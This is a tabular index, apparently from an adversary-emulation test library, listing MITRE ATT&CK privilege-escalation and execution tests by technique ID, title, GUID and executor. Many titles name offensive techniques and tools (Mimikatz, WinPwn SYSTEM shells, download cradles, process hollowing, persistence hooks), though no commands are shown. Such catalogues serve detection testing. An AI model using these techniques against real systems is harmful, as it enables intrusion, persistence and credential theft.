893 privilege-escalation T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
894 privilege-escalation T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 2 MacOS - Load Kernel Module via kextload and kmutil f4391089-d3a5-4dd1-ab22-0419527f2672 bash
895 privilege-escalation T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 3 MacOS - Load Kernel Module via KextManagerLoadKextWithURL() f0007753-beb3-41ea-9948-760785e4c1e5 bash
896 privilege-escalation T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 4 Snake Malware Kernel Driver Comadmin e5cb5564-cc7b-4050-86e8-f2d9eec1941f powershell
897 privilege-escalation T1053.006 Scheduled Task/Job: Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
898 privilege-escalation T1053.006 Scheduled Task/Job: Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
899 privilege-escalation T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
900 privilege-escalation T1055.012 Process Injection: Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
901 privilege-escalation T1055.012 Process Injection: Process Hollowing 2 RunPE via VBA 3ad4a037-1598-4136-837c-4027e4fa319b powershell
902 privilege-escalation T1055.012 Process Injection: Process Hollowing 3 Process Hollowing in Go using CreateProcessW WinAPI c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a powershell
903 privilege-escalation T1055.012 Process Injection: Process Hollowing 4 Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012) 94903cc5-d462-498a-b919-b1e5ab155fee powershell
904 privilege-escalation T1546 Event Triggered Execution 1 Persistence with Custom AutodialDLL aca9ae16-7425-4b6d-8c30-cad306fdbd5b powershell
905 privilege-escalation T1546 Event Triggered Execution 2 HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) a574dafe-a903-4cce-9701-14040f4f3532 powershell
906 privilege-escalation T1546 Event Triggered Execution 3 HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01 powershell
907 privilege-escalation T1546 Event Triggered Execution 4 WMI Invoke-CimMethod Start Process adae83d3-0df6-45e7-b2c3-575f91584577 powershell
908 privilege-escalation T1546 Event Triggered Execution 5 Adding custom debugger for Windows Error Reporting 17d1a3cc-3373-495a-857a-e5dd005fb302 command_prompt
909 privilege-escalation T1546 Event Triggered Execution 6 Load custom DLL on mstsc execution 2db7852e-5a32-4ec7-937f-f4e027881700 command_prompt
910 privilege-escalation T1546 Event Triggered Execution 7 Persistence using automatic execution of custom DLL during RDP session b7fc4c3f-fe6e-479a-ba27-ef91b88536e3 command_prompt
911 privilege-escalation T1546 Event Triggered Execution 8 Persistence via ErrorHandler.cmd script execution 547a4736-dd1c-4b48-b4fe-e916190bb2e7 powershell
912 privilege-escalation T1546 Event Triggered Execution 9 Persistence using STARTUP-PATH in MS-WORD f0027655-25ef-47b0-acaf-3d83d106156c command_prompt
913 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
914 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
915 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 3 Add command to .shrc 41502021-591a-4649-8b6e-83c9192aff53 sh
916 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 4 Append to the system shell profile 694b3cc8-6a78-4d35-9e74-0123d009e94b sh
917 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 5 Append commands user shell profile bbdb06bc-bab6-4f5b-8232-ba3fbed51d77 sh
918 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 6 System shell profile scripts 8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4 sh
919 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 7 Create/Append to .bash_logout 37ad2f24-7c53-4a50-92da-427a4ad13f58 bash
920 privilege-escalation T1134.005 Access Token Manipulation: SID-History Injection 1 Injection SID-History with mimikatz 6bef32e5-9456-4072-8f14-35566fb85401 command_prompt
921 privilege-escalation T1547.002 Authentication Package 1 Authentication Package be2590e8-4ac3-47ac-b4b5-945820f2fbe9 powershell
922 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 1 COM Hijacking - InprocServer32 48117158-d7be-441b-bc6a-d9e36e47b52b powershell
923 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 2 Powershell Execute COM Object 752191b1-7c71-445c-9dbe-21bb031b18eb powershell
924 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 3 COM Hijacking with RunDLL32 (Local Server Switch) 123520cc-e998-471b-a920-bd28e3feafa0 powershell
925 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 4 COM hijacking via TreatAs 33eacead-f117-4863-8eb0-5c6304fbfaa9 powershell
926 privilege-escalation T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
927 privilege-escalation T1037.005 Boot or Logon Initialization Scripts: Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
928 privilege-escalation T1037.005 Boot or Logon Initialization Scripts: Startup Items 2 Add launch script to launch daemon fc369906-90c7-4a15-86fd-d37da624dde6 bash
929 privilege-escalation T1037.005 Boot or Logon Initialization Scripts: Startup Items 3 Add launch script to launch agent 10cf5bec-49dd-4ebf-8077-8f47e420096f bash
930 privilege-escalation T1546.010 Event Triggered Execution: AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
931 privilege-escalation T1546.002 Event Triggered Execution: Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
932 privilege-escalation T1543.001 Create or Modify System Process: Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
933 privilege-escalation T1543.001 Create or Modify System Process: Launch Agent 2 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
934 privilege-escalation T1543.001 Create or Modify System Process: Launch Agent 3 Launch Agent - Root Directory 66774fa8-c562-4bae-a58d-5264a0dd9dd7 bash
935 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
936 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
937 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 sh
938 privilege-escalation T1543.002 Create or Modify System Process: SysV/Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
939 privilege-escalation T1543.002 Create or Modify System Process: SysV/Systemd Service 2 Create SysV Service 760fe8d2-79d9-494f-905e-a239a3df86f6 sh
940 privilege-escalation T1543.002 Create or Modify System Process: SysV/Systemd Service 3 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
941 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 1 Copy in loginwindow.plist for Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba sh
942 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 2 Re-Opened Applications using LoginHook 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
943 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 3 Append to existing loginwindow for Re-Opened Applications 766b6c3c-9353-4033-8b7e-38b309fa3a93 sh
944 privilege-escalation T1098.002 Account Manipulation: Additional Email Delegate Permissions 1 EXO - Full access mailbox permission granted to a user 17d046be-fdd0-4cbb-b5c7-55c85d9d0714 powershell
945 privilege-escalation T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
946 privilege-escalation T1055.015 Process Injection: ListPlanting 1 Process injection ListPlanting 4f3c7502-b111-4dfe-8a6e-529307891a59 powershell
947 privilege-escalation T1547.008 Boot or Logon Autostart Execution: LSASS Driver 1 Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt 8ecef16d-d289-46b4-917b-0dba6dc81cf1 powershell
948 privilege-escalation T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
949 privilege-escalation T1078.004 Valid Accounts: Cloud Accounts 2 Azure Persistence Automation Runbook Created or Modified 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac powershell
950 privilege-escalation T1078.004 Valid Accounts: Cloud Accounts 3 GCP - Create Custom IAM Role 3a159042-69e6-4398-9a69-3308a4841c85 sh
951 privilege-escalation T1053.002 Scheduled Task/Job: At 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
952 privilege-escalation T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
953 privilege-escalation T1053.002 Scheduled Task/Job: At 3 At - Schedule a job via kubectl in a Pod 9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213 bash
954 privilege-escalation T1055.001 Process Injection: Dynamic-link Library Injection 1 Process Injection via mavinject.exe 74496461-11a1-4982-b439-4d87a550d254 powershell
955 privilege-escalation T1055.001 Process Injection: Dynamic-link Library Injection 2 WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique 8b56f787-73d9-4f1d-87e8-d07e89cbc7f5 powershell
956 privilege-escalation T1546.007 Event Triggered Execution: Netsh Helper DLL 1 Netsh Helper DLL Registration 3244697d-5a3a-4dfc-941c-550f69f91a4d command_prompt
957 privilege-escalation T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
958 privilege-escalation T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
959 privilege-escalation T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
960 privilege-escalation T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
961 privilege-escalation T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
962 privilege-escalation T1078.003 Valid Accounts: Local Accounts 6 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
963 privilege-escalation T1078.003 Valid Accounts: Local Accounts 7 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
964 privilege-escalation T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
965 privilege-escalation T1078.003 Valid Accounts: Local Accounts 9 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
966 privilege-escalation T1078.003 Valid Accounts: Local Accounts 10 Reactivate a locked/expired account (FreeBSD) 09e3380a-fae5-4255-8b19-9950be0252cf sh
967 privilege-escalation T1078.003 Valid Accounts: Local Accounts 11 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
968 privilege-escalation T1078.003 Valid Accounts: Local Accounts 12 Login as nobody (freebsd) 16f6374f-7600-459a-9b16-6a88fd96d310 sh
969 privilege-escalation T1078.003 Valid Accounts: Local Accounts 13 Use PsExec to elevate to NT Authority\SYSTEM account 6904235f-0f55-4039-8aed-41c300ff7733 command_prompt
970 privilege-escalation T1574.012 Hijack Execution Flow: COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
971 privilege-escalation T1574.012 Hijack Execution Flow: COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
972 privilege-escalation T1574.012 Hijack Execution Flow: COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
973 execution T1053.005 Scheduled Task/Job: Scheduled Task 1 Scheduled Task Startup Script fec27f65-db86-4c2d-b66c-61945aee87c2 command_prompt
974 execution T1053.005 Scheduled Task/Job: Scheduled Task 2 Scheduled task Local 42f53695-ad4a-4546-abb6-7d837f644a71 command_prompt
975 execution T1053.005 Scheduled Task/Job: Scheduled Task 3 Scheduled task Remote 2e5eac3e-327b-4a88-a0c0-c4057039a8dd command_prompt
976 execution T1053.005 Scheduled Task/Job: Scheduled Task 4 Powershell Cmdlet Scheduled Task af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd powershell
977 execution T1053.005 Scheduled Task/Job: Scheduled Task 5 Task Scheduler via VBA ecd3fa21-7792-41a2-8726-2c5c673414d3 powershell
978 execution T1053.005 Scheduled Task/Job: Scheduled Task 6 WMI Invoke-CimMethod Scheduled Task e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b powershell
979 execution T1053.005 Scheduled Task/Job: Scheduled Task 7 Scheduled Task Executing Base64 Encoded Commands From Registry e895677d-4f06-49ab-91b6-ae3742d0a2ba command_prompt
980 execution T1053.005 Scheduled Task/Job: Scheduled Task 8 Import XML Schedule Task with Hidden Attribute cd925593-fbb4-486d-8def-16cbdf944bf4 powershell
981 execution T1053.005 Scheduled Task/Job: Scheduled Task 9 PowerShell Modify A Scheduled Task dda6fc7b-c9a6-4c18-b98d-95ec6542af6d powershell
982 execution T1053.005 Scheduled Task/Job: Scheduled Task 10 Scheduled Task ("Ghost Task") via Registry Key Manipulation 704333ca-cc12-4bcf-9916-101844881f54 command_prompt
983 execution T1053.005 Scheduled Task/Job: Scheduled Task 11 Scheduled Task Persistence via CompMgmt.msc 8fcfa3d5-ea7d-4e1c-bd3e-3c4ed315b7d2 command_prompt
984 execution T1053.005 Scheduled Task/Job: Scheduled Task 12 Scheduled Task Persistence via Eventviewer.msc 02124c37-767e-4b76-9383-c9fc366d9d4c command_prompt
985 execution T1047 Windows Management Instrumentation 1 WMI Reconnaissance Users c107778c-dcf5-47c5-af2e-1d058a3df3ea command_prompt
986 execution T1047 Windows Management Instrumentation 2 WMI Reconnaissance Processes 5750aa16-0e59-4410-8b9a-8a47ca2788e2 command_prompt
987 execution T1047 Windows Management Instrumentation 3 WMI Reconnaissance Software 718aebaa-d0e0-471a-8241-c5afa69c7414 command_prompt
988 execution T1047 Windows Management Instrumentation 4 WMI Reconnaissance List Remote Services 0fd48ef7-d890-4e93-a533-f7dedd5191d3 command_prompt
989 execution T1047 Windows Management Instrumentation 5 WMI Execute Local Process b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 command_prompt
990 execution T1047 Windows Management Instrumentation 6 WMI Execute Remote Process 9c8ef159-c666-472f-9874-90c8d60d136b command_prompt
991 execution T1047 Windows Management Instrumentation 7 Create a Process using WMI Query and an Encoded Command 7db7a7f9-9531-4840-9b30-46220135441c command_prompt
992 execution T1047 Windows Management Instrumentation 8 Create a Process using obfuscated Win32_Process 10447c83-fc38-462a-a936-5102363b1c43 powershell
993 execution T1047 Windows Management Instrumentation 9 WMI Execute rundll32 00738d2a-4651-4d76-adf2-c43a41dfb243 command_prompt
994 execution T1047 Windows Management Instrumentation 10 Application uninstall using WMIC c510d25b-1667-467d-8331-a56d3e9bc4ff command_prompt
995 execution T1129 Server Software Component 1 ESXi - Install a custom VIB on an ESXi host 7f843046-abf2-443f-b880-07a83cf968ec command_prompt
996 execution T1059.007 Command and Scripting Interpreter: JavaScript 1 JScript execution to gather local computer information via cscript 01d75adf-ca1b-4dd1-ac96-7c9550ad1035 command_prompt
997 execution T1059.007 Command and Scripting Interpreter: JavaScript 2 JScript execution to gather local computer information via wscript 0709945e-4fec-4c49-9faf-c3c292a74484 command_prompt
998 execution T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
999 execution T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
1000 execution T1559.002 Inter-Process Communication: Dynamic Data Exchange 1 Execute Commands f592ba2a-e9e8-4d62-a459-ef63abd819fd manual
1001 execution T1559.002 Inter-Process Communication: Dynamic Data Exchange 2 Execute PowerShell script via Word DDE 47c21fb6-085e-4b0d-b4d2-26d72c3830b3 command_prompt
1002 execution T1559.002 Inter-Process Communication: Dynamic Data Exchange 3 DDEAUTO cf91174c-4e74-414e-bec0-8d60a104d181 manual
1003 execution T1204.002 User Execution: Malicious File 1 OSTap Style Macro Execution 8bebc690-18c7-4549-bc98-210f7019efff powershell
1004 execution T1204.002 User Execution: Malicious File 2 OSTap Payload Download 3f3af983-118a-4fa1-85d3-ba4daa739d80 command_prompt
1005 execution T1204.002 User Execution: Malicious File 3 Maldoc choice flags command execution 0330a5d2-a45a-4272-a9ee-e364411c4b18 powershell
1006 execution T1204.002 User Execution: Malicious File 4 OSTAP JS version add560ef-20d6-4011-a937-2c340f930911 powershell
1007 execution T1204.002 User Execution: Malicious File 5 Office launching .bat file from AppData 9215ea92-1ded-41b7-9cd6-79f9a78397aa powershell
1008 execution T1204.002 User Execution: Malicious File 6 Excel 4 Macro 4ea1fc97-8a46-4b4e-ba48-af43d2a98052 powershell
1009 execution T1204.002 User Execution: Malicious File 7 Headless Chrome code execution via VBA a19ee671-ed98-4e9d-b19c-d1954a51585a powershell
1010 execution T1204.002 User Execution: Malicious File 8 Potentially Unwanted Applications (PUA) 02f35d62-9fdc-4a97-b899-a5d9a876d295 powershell
1011 execution T1204.002 User Execution: Malicious File 9 Office Generic Payload Download 5202ee05-c420-4148-bf5e-fd7f7d24850c powershell
1012 execution T1204.002 User Execution: Malicious File 10 LNK Payload Download 581d7521-9c4b-420e-9695-2aec5241167f powershell
1013 execution T1204.002 User Execution: Malicious File 11 Mirror Blast Emulation 24fd9719-7419-42dd-bce6-ab3463110b3c powershell
1014 execution T1204.002 User Execution: Malicious File 12 ClickFix Campaign - Abuse RunMRU to Launch mshta via PowerShell 3f3120f0-7e50-4be2-88ae-54c61230cb9f powershell
1015 execution T1204.002 User Execution: Malicious File 13 Simulate Click-Fix via Downloaded BAT File 22386853-f68d-4b50-a362-de235127c443 powershell
1016 execution T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 sh
1017 execution T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
1018 execution T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /etc/cron.d folder 078e69eb-d9fb-450e-b9d0-2e118217c846 sh
1019 execution T1053.003 Scheduled Task/Job: Cron 4 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
1020 execution T1059.002 Command and Scripting Interpreter: AppleScript 1 AppleScript 3600d97d-81b9-4171-ab96-e4386506e2c2 sh
1021 execution T1106 Native API 1 Execution through API - CreateProcess 99be2089-c52d-4a4a-b5c3-261ee42c8b62 command_prompt
1022 execution T1106 Native API 2 WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique ce4e76e6-de70-4392-9efe-b281fc2b4087 powershell
1023 execution T1106 Native API 3 WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique 7ec5b74e-8289-4ff2-a162-b6f286a33abd powershell
1024 execution T1106 Native API 4 WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique e1f93a06-1649-4f07-89a8-f57279a7d60e powershell
1025 execution T1106 Native API 5 Run Shellcode via Syscall in Go ae56083f-28d0-417d-84da-df4242da1f7c powershell
1026 execution T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT 1 AutoHotKey script execution 7b5d350e-f758-43cc-a761-8e3f6b052a03 powershell
1027 execution T1610 Deploy a container 1 Deploy Docker container 59aa6f26-7620-417e-9318-589e0fb7a372 bash
1028 execution T1059 Command and Scripting Interpreter 1 AutoIt Script Execution a9b93f17-31cb-435d-a462-5e838a2a6026 powershell
1029 execution T1609 Kubernetes Exec Into Container 1 ExecIntoContainer d03bfcd3-ed87-49c8-8880-44bb772dea4b bash
1030 execution T1609 Kubernetes Exec Into Container 2 Docker Exec Into Container 900e2c49-221b-42ec-ae3c-4717e41e6219 bash
1031 execution T1569.001 System Services: Launchctl 1 Launchctl 6fb61988-724e-4755-a595-07743749d4e2 bash
1032 execution T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
1033 execution T1072 Software Deployment Tools 2 PDQ Deploy RAT e447b83b-a698-4feb-bed1-a7aaf45c3443 command_prompt
1034 execution T1072 Software Deployment Tools 3 Deploy 7-Zip Using Chocolatey 2169e8b0-2ee7-44cb-8a6e-d816a5db7d8a powershell
1035 execution T1059.001 Command and Scripting Interpreter: PowerShell 1 Mimikatz f3132740-55bc-48c4-bcc0-758a459cd027 command_prompt
1036 execution T1059.001 Command and Scripting Interpreter: PowerShell 2 Run BloodHound from local disk a21bb23e-e677-4ee7-af90-6931b57b6350 powershell
1037 execution T1059.001 Command and Scripting Interpreter: PowerShell 3 Run Bloodhound from Memory using Download Cradle bf8c1441-4674-4dab-8e4e-39d93d08f9b7 powershell
1038 execution T1059.001 Command and Scripting Interpreter: PowerShell 4 Mimikatz - Cradlecraft PsSendKeys af1800cf-9f9d-4fd1-a709-14b1e6de020d powershell
1039 execution T1059.001 Command and Scripting Interpreter: PowerShell 5 Invoke-AppPathBypass 06a220b6-7e29-4bd8-9d07-5b4d86742372 command_prompt
1040 execution T1059.001 Command and Scripting Interpreter: PowerShell 6 Powershell MsXml COM object - with prompt 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da command_prompt
1041 execution T1059.001 Command and Scripting Interpreter: PowerShell 7 Powershell XML requests 4396927f-e503-427b-b023-31049b9b09a6 command_prompt
1042 execution T1059.001 Command and Scripting Interpreter: PowerShell 8 Powershell invoke mshta.exe download 8a2ad40b-12c7-4b25-8521-2737b0a415af command_prompt
1043 execution T1059.001 Command and Scripting Interpreter: PowerShell 9 Powershell Invoke-DownloadCradle cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 manual
1044 execution T1059.001 Command and Scripting Interpreter: PowerShell 10 PowerShell Fileless Script Execution fa050f5e-bc75-4230-af73-b6fd7852cd73 powershell
1045 execution T1059.001 Command and Scripting Interpreter: PowerShell 11 NTFS Alternate Data Stream Access 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 powershell
1046 execution T1059.001 Command and Scripting Interpreter: PowerShell 12 PowerShell Session Creation and Use 7c1acec2-78fa-4305-a3e0-db2a54cddecd powershell
1047 execution T1059.001 Command and Scripting Interpreter: PowerShell 13 ATHPowerShellCommandLineParameter -Command parameter variations 686a9785-f99b-41d4-90df-66ed515f81d7 powershell
1048 execution T1059.001 Command and Scripting Interpreter: PowerShell 14 ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments 1c0a870f-dc74-49cf-9afc-eccc45e58790 powershell
1049 execution T1059.001 Command and Scripting Interpreter: PowerShell 15 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations 86a43bad-12e3-4e85-b97c-4d5cf25b95c3 powershell
1050 execution T1059.001 Command and Scripting Interpreter: PowerShell 16 ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments 0d181431-ddf3-4826-8055-2dbf63ae848b powershell
1051 execution T1059.001 Command and Scripting Interpreter: PowerShell 17 PowerShell Command Execution a538de64-1c74-46ed-aa60-b995ed302598 command_prompt
1052 execution T1059.001 Command and Scripting Interpreter: PowerShell 18 PowerShell Invoke Known Malicious Cmdlets 49eb9404-5e0f-4031-a179-b40f7be385e3 powershell
1053 execution T1059.001 Command and Scripting Interpreter: PowerShell 19 PowerUp Invoke-AllChecks 1289f78d-22d2-4590-ac76-166737e1811b powershell
1054 execution T1059.001 Command and Scripting Interpreter: PowerShell 20 Abuse Nslookup with DNS Records 999bff6d-dc15-44c9-9f5c-e1051bfc86e1 powershell
1055 execution T1059.001 Command and Scripting Interpreter: PowerShell 21 SOAPHound - Dump BloodHound Data 6a5b2a50-d037-4879-bf01-43d4d6cbf73f powershell
1056 execution T1059.001 Command and Scripting Interpreter: PowerShell 22 SOAPHound - Build Cache 4099086c-1470-4223-8085-8186e1ed5948 powershell
1057 execution T1053.006 Scheduled Task/Job: Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
1058 execution T1053.006 Scheduled Task/Job: Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
1059 execution T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
1060 execution T1059.004 Command and Scripting Interpreter: Bash 1 Create and Execute Bash Shell Script 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 sh
1061 execution T1059.004 Command and Scripting Interpreter: Bash 2 Command-Line Interface d0c88567-803d-4dca-99b4-7ce65e7b257c sh
1062 execution T1059.004 Command and Scripting Interpreter: Bash 3 Harvest SUID executable files 46274fc6-08a7-4956-861b-24cbbaa0503c sh
1063 execution T1059.004 Command and Scripting Interpreter: Bash 4 LinEnum tool execution a2b35a63-9df1-4806-9a4d-5fe0500845f2 sh
1064 execution T1059.004 Command and Scripting Interpreter: Bash 5 New script file in the tmp directory 8cd1947b-4a54-41fb-b5ea-07d0ace04f81 sh
1065 execution T1059.004 Command and Scripting Interpreter: Bash 6 What shell is running 7b38e5cc-47be-44f0-a425-390305c76c17 sh
1066 execution T1059.004 Command and Scripting Interpreter: Bash 7 What shells are available bf23c7dc-1004-4949-8262-4c1d1ef87702 sh
1067 execution T1059.004 Command and Scripting Interpreter: Bash 8 Command line scripts b04ed73c-7d43-4dc8-b563-a2fc595cba1a sh
1068 execution T1059.004 Command and Scripting Interpreter: Bash 9 Obfuscated command line scripts 5bec4cc8-f41e-437b-b417-33ff60acf9af sh
1069 execution T1059.004 Command and Scripting Interpreter: Bash 10 Change login shell c7ac59cb-13cc-4622-81dc-6d2fee9bfac7 bash
1070 execution T1059.004 Command and Scripting Interpreter: Bash 11 Environment variable scripts bdaebd56-368b-4970-a523-f905ff4a8a51 sh
1071 execution T1059.004 Command and Scripting Interpreter: Bash 12 Detecting pipe-to-shell fca246a8-a585-4f28-a2df-6495973976a1 sh
1072 execution T1059.004 Command and Scripting Interpreter: Bash 13 Current kernel information enumeration 3a53734a-9e26-4f4b-ad15-059e767f5f14 sh
1073 execution T1059.004 Command and Scripting Interpreter: Bash 14 Shell Creation using awk command ee72b37d-b8f5-46a5-a9e7-0ff50035ffd5 sh
1074 execution T1059.004 Command and Scripting Interpreter: Bash 15 Creating shell using cpan command bcd4c2bc-490b-4f91-bd31-3709fe75bbdf sh
1075 execution T1059.004 Command and Scripting Interpreter: Bash 16 Shell Creation using busybox command ab4d04af-68dc-4fee-9c16-6545265b3276 sh
1076 execution T1059.004 Command and Scripting Interpreter: Bash 17 emacs spawning an interactive system shell e0742e38-6efe-4dd4-ba5c-2078095b6156 sh
1077 execution T1559 Inter-Process Communication 1 Cobalt Strike Artifact Kit pipe bd13b9fc-b758-496a-b81a-397462f82c72 command_prompt
1078 execution T1559 Inter-Process Communication 2 Cobalt Strike Lateral Movement (psexec_psh) pipe 830c8b6c-7a70-4f40-b975-8bbe74558acd command_prompt
1079 execution T1559 Inter-Process Communication 3 Cobalt Strike SSH (postex_ssh) pipe d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6 command_prompt
1080 execution T1559 Inter-Process Communication 4 Cobalt Strike post-exploitation pipe (4.2 and later) 7a48f482-246f-4aeb-9837-21c271ebf244 command_prompt
1081 execution T1559 Inter-Process Communication 5 Cobalt Strike post-exploitation pipe (before 4.2) 8dbfc15c-527b-4ab0-a272-019f469d367f command_prompt
1082 execution T1204.003 User Execution: Malicious Image 1 Malicious Execution from Mounted ISO Image e9795c8d-42aa-4ed4-ad80-551ed793d006 powershell
1083 execution T1059.006 Command and Scripting Interpreter: Python 1 Execute shell script via python's command mode arguement 3a95cdb2-c6ea-4761-b24e-02b71889b8bb sh
1084 execution T1059.006 Command and Scripting Interpreter: Python 2 Execute Python via scripts 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8 sh
1085 execution T1059.006 Command and Scripting Interpreter: Python 3 Execute Python via Python executables 0b44d79b-570a-4b27-a31f-3bf2156e5eaa sh
1086 execution T1059.006 Command and Scripting Interpreter: Python 4 Python pty module and spawn function used to spawn sh or bash 161d694c-b543-4434-85c3-c3a433e33792 sh
